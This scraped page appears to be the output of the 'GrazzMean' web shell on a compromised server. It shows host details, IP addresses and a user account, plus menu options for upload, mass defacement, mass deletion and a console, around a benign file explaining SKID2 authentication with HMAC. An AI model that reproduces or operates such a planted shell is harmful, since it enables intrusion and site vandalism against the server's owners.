phadsconsult.com - GrazzMean

info server

Uname: Linux web3.us.cloudlogin.co 5.10.226-xeon-hst #2 SMP Fri Sep 13 12:28:44 UTC 2024 x86_64
Software: Apache
PHP version: 8.1.31 [ PHP INFO ] PHP os: Linux
Server Ip: 162.210.96.117
Your Ip: 18.117.135.132
User: edustar (269686) | Group: tty (888)
Safe Mode: OFF
Disable Function:

NONE

upload mass deface mass delete console

name : skid2-authentication

Secure User authentication using HMAC and SKID2

In some cases it may be usefull to provide secure authentication
without the need of an encryption layer. We'll now discuss how to
implement the protocol SKID2 using the mhash HMAC functions.

Ok let's now assume we're on the server side and we want to authenticate
a client using username-password but without transmitting the password
in the clear.

Step 1. The server sends a random string (over 8 bytes) to the client
        Let's call it RANDOM1. 
        We send client RANDOM1.
        
Step 2. The client reads RANDOM1 and gets 
        the username and password from the user. 
        The client now calculates
        X = HMAC( password, RANDOM1+RANDOM2). 
        RANDOM2 is a random string generated by the client. Client sends 
        the server X, USERNAME, RANDOM2.

Step 3. The server now has the values: RANDOM1, RANDOM2, USERNAME, X.
	    a. Checks the users database for USERNAME and retrieves the
	       user's password (PASSWORD).
	    b. Checks if HMAC( PASSWORD, RANDOM1+RANDOM2) == X
	       If it is not the same abort.


Now we have the user authenticated.

GrazzMean Shell